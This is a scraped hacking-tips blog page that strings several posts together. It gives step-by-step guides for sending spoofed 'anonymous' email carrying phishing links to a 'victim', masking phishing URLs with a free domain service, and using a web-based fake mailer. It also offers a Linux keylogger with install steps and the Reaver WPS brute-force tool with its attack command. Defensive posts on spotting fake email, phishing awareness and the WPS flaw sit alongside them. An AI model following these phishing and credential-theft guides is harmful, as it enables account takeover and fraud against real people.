5. Now click on "Properties" then make it "Enabled" and set "Bandwidth limit: 0". Click OK and you are done.


Now you should have faster internet already. Hope this tutorial was useful for you. 







Anonymous Mailer Software to Hack Gmail, Hotmail and Yahoo Passwords

Send anonymous email to Hack Facebook, MySpace, Youtube, Hotmail, Yahoo, Gmail Accont Passwords
Anonymous Mailer is an Award winning anonymous Email sending software, by which a user can send Emails directly from computer, no matter the From email id exists or not. No need to reveal your original email address to anyone. Send emails from any@any.com.

So, just follow steps below to be able to send anonymous email using this anonymous mailer software.

Anonymous mailer - Send anonymous email to Hack Facebook, MySpace, Hotmail, Yahoo, Gmail Accont Passwords

1. First of all download Anonymous mailer software from here.

2. Run Nemesis Anonymous Mailer.exe file to see something like this:


3. Now, fill in following information:
  • Name: Name of email account you want to appear on email.
  • Email From: Email address (fake) which will appear to victim as if email is being sent from this email address.
  • Email To: Victim email address.
  • Subject: Subject of anonymous email.
  • Message: The body of anonymous email.... include phisher link over here.
4. Also, this anonymous mailer software has unique feature of assigning itself proxy while sending email. So, your real IP address is never revealed to victim. For this, check "Enable Proxy" and enter the proxy server address which you wanna use.

5. Now, hit on "Send" and your email will be send to victim like this:
    



6. And on opening the email, victim will fall to our email. As sender email id will be the one we have entered in "Email From" field as shown below:
             


7. Now, our anonymous email sent successfully is ready to hack hotmail, yahoo, gmail, facebook, myspace, etc. passwords via this anonymous email.

Note: The software is available as trial version and you can use it only 3 times per computer.

You will be now able to send anonymous email using this anonymous mailer software. Anonymous mailer software is useful in Phishing used to hack email passwords. 



Learn How To Mask URL

As we all know, Phishing is one of the most useful and simple methods for hacking email accounts. When sending a phishing mail you have to include the link to your phisher page, so instead of sending mail with actual URL that can create a sense of doubt in victim's mind, we can hide the URL. Dot.tk is an online service which enables you to hide/mask the url.

How to Mask a URL:

Consider you have hosted your phisher page and your phisher link is something like: http://www.facebook.110mb.com

So, whenever victim checks out this link, he will find the link suspicious. This can be detrimental for our hack. The best way is to make this link less suspicious i.e. to hide/mask the URL.

1. Go to Dot.tk to hide a URL.

2. Enter your phisher link in the textbox and hit on Next.



3. Enter the link you want to rename your phisher link to.



4. Now, you can send this masked phisher link to your victim. The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain. 




w to Send Anonymous Email - Fake Mailer

Phishing is one of the most useful and simple methods for hacking email accounts. When using phishing you need to send an email to your victim that contains the link to your phisher page. The victim will click on this link only if he finds the mail genuine, so we need a fake mailer to make this mail appear genuine.

In this post i will show you how to send anonymous email to your victim using Fake Mailer.

1. Go to Fake Mailer website to send anonymous email.



2. Now, enter the information as shown:

From Name: The Sender name which will appear on Email
From Email: The sender Email address
To: Victim email address
Subject: Subject of the Email
Content-type: Select text/html
Text: The content of your mail. Put something which will make your victim to click on your phisher link.

3. Now, enter captcha and hit on Send.

4. Your victim will receive mail like this:



This Fake Mailer is pretty easy to use and also very handy to send anonymous email to your friend or victim. 




Keylogger for Linux


Lots of people actually believe that Trojans are invalid against Linux operating systems. The reality is that Trojan are valid against Linux operating systems, but they infect in a different manner.

LKL is a famous Linux keylogger that runs under Linux on the x86 arch. LKL sniffs and logs everything that passes through the hardware keyboard port (0x60). It translates keycodes to ASCII with a keymap file.

Installation:

The 'configure' shell script attempts to guess correct values for various system-dependent variables used during compilation.

It uses those values to create a 'Makefile' in each directory of the package. It may also create one or more '.h' files containing system-dependent definitions.

Finally, it creates a shell script 'config.status' that you can run in the future to recreate the current configuration, a file 'config.cache' that saves the results of its tests to speed up
reconfiguring, and a file 'config.log' containing compiler output (useful mainly for debugging 'configure').

If you need to do unusual things to compile the package, please try to figure out how 'configure' could check whether to do them, and mail diffs or instructions to the address given in the 'README' so they can be considered for the next release.

If at some point 'config.cache' contains results you don't want to keep, you may remove or edit it.

The file 'configure.in' is used to create 'configure' by a program called 'autoconf'. You only need 'configure.in' if you want to change it or regenerate 'configure' using a newer version of 'autoconf'.

The simplest way to compile this package is:

1. 'cd' to the directory containing the package's source code and type './configure' to configure the package for your system.

If you're using 'csh' on an old version of System V, you might need to type 'sh ./configure' instead to prevent 'csh' from trying to execute 'configure' itself.

Running 'configure' takes awhile. While running, it prints some messages telling which features it is checking for.

2. Type 'make' to compile the package.

3. Optionally, type 'make check' to run any self-tests that come with the package.

4. Type 'make install' to install the programs and any data files and documentation.

5. You can remove the program binaries and object files from the source code directory by typing 'make clean'. To also remove the files that 'configure' created (so you can compile the package for a different kind of computer), type 'make distclean'.

There is also a 'make maintainer-clean' target, but that is intended mainly for the package's developers. If you use it, you may have to get all sorts of other programs in order to regenerate files that came with the distribution.
                                      DOWNLOAD IT FROM HERE




Lock Your Computer With USB Flash Drive

Security of laptops and notebooks have been evolving with new technologies like fingerprint readers, eye scanners, face recognition etc but what about the personal computers?

Using this trick you will be able to lock your computer with a Usb. The computer will work only when the Usb is plugged in. Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark. Moreover your computer will get automatically locked. To unlock the computer you will need to insert the Usb again.

This trick will work on on all versions of windows including both windows 32 bit and 64 bit

Here is the Trick to lock Your Computer With Usb Using Predator

1. Download predator software by clicking here

2. Predator will get launched automatically after completing installation if not you can run it from Start/Programs/Predator

3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)



4. Click on Ok and Enter your your new password in next dialog box

5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list

6. Finally click on Create Key button and then on OK button



After this the software will automatically exit.Now restart the program by clicking the icon on desktop.

Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself. 


Get a Free Serial License Key for SpeedUpMyPC 2011

Here is an opportunity for you to grab 1 year license key of SpeedUpMyPC 2011. The actual cost of the software is $39.95. This offer is valid till 1st June so grab it before its too late.

SpeedUpMyPC 2011 is Gold Certified from Microsoft. It will boost your computer speed by optimizing processes, registry, settings and cleaning your computer of unnecessary and junk files.

Here are some key features of "SpeedUpMyPC 2011":

  • Free Memory - Free Up Memory (RAM)
  • Monitor Memory Usage in Real-Time
  • Automatically Optmize Memory Usage
  • CPU Usage - Optimize CPU Usage
  • Assign More Resources to Your Favorite Applications
  • Monitor CPU Usage in Real-Time
  • Internet Speed - Test Your Connection Speed
  • Optimize Your Internet and Browser Settings
  • Remove Annoying Popups While Surfing
  • Startup Speed - Automatically Log Startup Times
  • Remove Unnecessary Background Programs
  • Improve Startup Times Considerably
  • Stability - Recover from Crashes
  • Terminate Suspicious Applications
  • Use Quick Keys to Start System Recovery
  • Disk Speed - Monitor Disk Usage in Real-Time
  • Test Disk Performance
  • Show Disk Usage om Graphs for the Last Hour

To grab the 1 year license key for free follow the step below


1. Click Here to go to promotional page



2. Now Click on the Get your Free product Button



3. Enter all the details and the click on Complete Registration button



4. Now you will get your download link for the software and its license key.These details will also be emailed to for future use.

How To Activate SpeedUpMyPC 2011 with Serial key

  • Install the software that you have already downloaded from the promotional page
  • Open the software and Click on the Register Now button of the bottom left of the window
  • Copy the serial key that you got from the promotional page

SpeedUpMyPC 2011 is compatible with all versions of Windows including Windows 7




How to Detect Fake Emails

How to Detect Fake Mails:

1. Lets get back to the example I illustrated in my article Fake Mailer. I had used "support@gmail.com" as the sender email address. No doubt, this was fake and the receiver will get the fake email sent by me.

2. Suppose you are the receiver. Now, I will tell you how to recognize this mail as fake. Open the email and hit on "Show Details".

3. Something you must know:



Whenever Google sends you any email, the email details will contain fields like:

- Mailed by
- Signed by (optional)


Also, most of the times, "Mailed by" field will have value:

*.bounces.google.com or
*.google.com


depending on the type of your mail. This is true for every genuine email from every mail provider.

4. But, these two fields will not be present in the details of Fake Mail. Also, if the mail details contain these fields, the value of these fields will not be *.google.com

Fake Mail without "Mailed by" field:



Fake Mail with "Mailed by" field.



As you can see, the "mailed by" field shows the hosting server's name and not the Google server. This means, this server is used to send you the fake email and most probably, the fake mailer is hosted on the same server.


You can also check out the header field to detect fake mails. Follow the steps:

- Open the mail. Hit on down arrow next to "Reply" and click on "Show Original".



- Now, check out "Received" fields. This field will show you the name of server from which the mail is sent. As you can see, we have used "emkei.cz" as our fake mailer. So, it has appeared in "Received" field.

More Tips:

- Fake Mail usually have attractive titles.
- Such mails address receiver as "Dear Customer" or such and do not use your real name.
- Never click on any link in emails. Instead, open such links manually in new tab. Refer my article Anti-Phishing measures for more information.

Follow these tips and you will be able to recognize fake, spoof, spam emails. If you know any other useful tip to detect fake or spam emails, please share it with us in comments. 



Know More About Phishing Attacks


Phishing is a method of stealing login info (usernames and passwords) by directing the victim to a clone (fake) login page, that logs the login info without the knowledge of the victim. Such clone website is known as a phisher. eBay, PayPal and other online banks are common targets. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.

How to protect yourself against phishing?
  • Use your login info in the correct places only.

Don't ever put your login info anywhere else than the page you registered to, unless it's a trusted service, such as youtube or blogger, asking for your google account's info).
  • Make sure the website you're logging in isn't fake.

Whenever you login to a website, if you didn't type the URL (address) of the website yourself, i.e. if you clicked a link that led you to the login page (from message, website, search engine results), always check the url (address) to see if you're in the right place.

For instance, if you're logging in your facebook account, make sure the url appears as http://www.facebook.com/
Where a phisher page would look like http://www.facebook.freewebs.com/, or http://www.facebook.spam.com/, or any url whose part before the .com isn't exactly the same as the page you want to login to.
  • Make sure the links you're clicking aren't fake.

Whenever you're clicking a link, check where the link goes before clicking it. Links can be masked to appear as something else than the page they're leading to. For example, www.google.com leads to yahoo instead of google. Fortunately, in most browsers, whenever you point your mouse cursor over the link, the true location of the link is displayed on the bottom left part of the screen.
This is particularly important because it can protect you from another, rarer but more dangerous method called cookie stealing, which is basically automatically stealing your account if you're previously logged in the website.

Know that links to phishing pages are usually spread via email, and often represent impersonating trusted services and persons, such as making the email appear as it's sent from the website you've registered to, or a friend of yours whose account has been compromised.


What to do if you have spotted a phisher?


  • If the phishing attempt has been done via message, report the message in any of the following services:

http://www.reportphish.org/forwardphish.php
http://www.us-cert.gov/nav/report_phishing.html
  • If you received the message from a friend's compromised account, inform your friend, and other friends that might be in danger.

  • If possible, inform the admin of the website that the phisher is made for.

So the Bottom line to defend from phishing attack is

1. Never assume that an email is valid based on the sender’s email address.

2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.

3. An email from trusted organization will never contain attachments or software.

4. Clicking on a link in an email is the most insecure way to get to your account. 






Reaver – WiFi Protected Setup Brute Force Attack Tool

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
While Reaver does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known.
Description:
Reaver targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP’s 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number.
Installation:
Reaver is only supported on the Linux platform, requires the libpcap and libsqlite3 libraries, and can be built and installed by running:
$ ./configure
$ make
# make install
To remove everything installed/created by Reaver:
# make distclean
Usage:
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05
Download: reaver-1.3.tar.gz
Reaver Home: http://code.google.com/p/reaver-wps/





WiFi Protected Setup (WPS) PIN Brute Force Vulnerability

WiFi Protected Setup
The WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack. A design flaw that exists in the WPS specification for the PIN authentication significantly reduces the time required to brute force the entire PIN because it allows an attacker to know when the first half of the 8 digit PIN is correct. The lack of a proper lock out policy after a certain number of failed attempts to guess the PIN on many wireless routers makes this brute force attack that much more feasible.
Description:
WiFi Protected Setup (WPS) is a computing standard created by the WiFi Alliance to ease the setup and securing of a wireless home network. WPS contains an authentication method called “external registrar” that only requires the router’s PIN. By design this method is susceptible to brute force attacks against the PIN.
When the PIN authentication fails the access point will send an EAP-NACK message back to the client. The EAP-NACK messages are sent in a way that an attacker is able to determine if the first half of the PIN is correct. Also, the last digit of the PIN is known because it is a checksum for the PIN. This design greatly reduces the number of attempts needed to brute force the PIN. The number of attempts goes from 108 to 104 + 103 which is 11,000 attempts in total.
It has been reported that many wireless routers do not implement any kind of lock out policy for brute force attempts. This greatly reduces the time required to perform a successful brute force attack. It has also been reported that some wireless routers resulted in a denial-of-service condition because of the brute force attempt and required a reboot.
Impact:
An attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service.
Solution:
We are currently unaware of a practical solution to this problem. Please consider the following workarounds:
Disable WPS
Within the wireless router’s configuration menu, disable the external registrar feature of WiFi Protected Setup (WPS). Depending on the vendor, this may be labeled as external registrar, router PIN, or WiFi Protected Setup.
Vendor Information:
Vendor Status Date Notified Date Updated
Belkin, Inc. Affected 2012-01-06
Buffalo Inc. Affected 2011-12-27
D-Link Systems, Inc. Affected 2011-12-05 2011-12-27
Linksys (A division of Cisco Systems) Affected 2011-12-05 2011-12-27
Netgear, Inc. Affected 2011-12-05 2011-12-27
Technicolor Affected 2012-01-06
TP-Link Affected 2011-12-27
ZyXEL Affected 2011-12-27
Credit:
Stefan Viehböck
References:
wi-fi-protected-setup-pin-brute-force-vulnerability
Wi-Fi_Protected_Setup
WCN-Netspec.doc
wifi-protected-setup
WPS Vulnerability Tesing – Google Docs
disabling-wps-on-the-router




PacketFence – Open Source Network Access Control (NAC) System

PacketFence is a fully supported, trusted, Free and Open Source network access control (NAC) system.
Boasting an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1X support, layer-2 isolation of problematic devices, integration with the Snort IDS and the Nessus vulnerability scanner; PacketFence can be used to effectively secure networks – from small to very large heterogeneous networks.
What you can do with PacketFence :
PacketFence
  • Block iPods wireless access
  • Forbid rogue access points
  • Perform compliance checks
  • Eliminate Peer-to-Peer traffic
  • Provide guest access
  • Simplify VLAN management



No comments:

Post a Comment